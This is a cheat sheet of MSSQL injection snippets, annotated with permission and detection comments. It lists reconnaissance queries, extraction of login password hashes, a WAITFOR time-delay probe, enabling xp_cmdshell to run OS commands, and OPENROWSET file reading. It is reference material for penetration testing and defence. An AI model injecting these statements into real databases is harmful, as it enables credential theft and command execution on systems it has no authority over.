MSSQL Injection Cheat Sheet
Author: HollyGraceful Published: 05 August 2021 Last Updated: 03 July 2023
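-- MSSQL (T-SQL) reference snippets, one statement per line.
-- Section headers are written as T-SQL line comments so the listing parses as SQL.
-- Every statement below only reaches the server through an injection point when
-- the application concatenates input into the query text; bound parameters keep
-- the input as data.

-- Comments
-- Block comments are closed with */ (the unterminated form "/* Comment /*" is a syntax error).
/* Comment */
-- -

-- Version
SELECT @@VERSION;
-- version() is not a SQL Server built-in (it is the MySQL/PostgreSQL form), so it is kept as a comment only:
-- SELECT version();

-- User details
-- CURRENT_USER and SYSTEM_USER are niladic in T-SQL and take no parentheses.
SELECT CURRENT_USER;
SELECT SUSER_NAME();
SELECT SYSTEM_USER;

-- Database details
SELECT DB_NAME();

-- Database credentials
-- Rows for other logins are returned only to principals holding elevated
-- server-level permissions (for example ALTER ANY LOGIN); an application login
-- that can read these hashes is over-privileged.
SELECT name, password_hash FROM master.sys.sql_logins;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins;

-- Server details
SELECT HOST_NAME();

-- Table names
-- xtype = 'U' restricts the legacy sysobjects view to user tables.
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT table_name FROM information_schema.tables;

-- Column names ('tablename' is a placeholder)
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename');
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

-- String concatenation
-- CONCAT requires SQL Server 2012 or later; the + operator used in the credentials query works on older versions.
SELECT CONCAT('foo', 'bar');

-- Conditionals
-- IIF requires SQL Server 2012 or later.
SELECT IIF(1=1, 1, 0);

-- Time delay
-- The argument is hh:mm:ss, so this pauses for 9 seconds. Requests whose duration
-- tracks a fixed delay like this stand out in query-duration monitoring.
WAITFOR DELAY '0:0:9';

-- Command execution
-- xp_cmdshell is disabled by default and both sp_configure calls need the
-- ALTER SETTINGS server permission (sysadmin/serveradmin), so this sequence only
-- succeeds when the injected connection runs as a highly privileged login.
-- Each sp_configure change is written to the SQL Server error log, which makes
-- "xp_cmdshell changed from 0 to 1" a reliable alerting condition.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'dir';

-- Read files
-- The path literal is empty on the page and is left as a placeholder.
-- BULK access through OPENROWSET requires the ADMINISTER BULK OPERATIONS
-- permission (bulkadmin role); application logins should not hold it.
SELECT * FROM OPENROWSET(BULK N'', SINGLE_CLOB) AS Contents;

-- Substrings
-- SUBSTRING is 1-indexed: this returns 'F'.
SELECT SUBSTRING('Foobar', 1, 1);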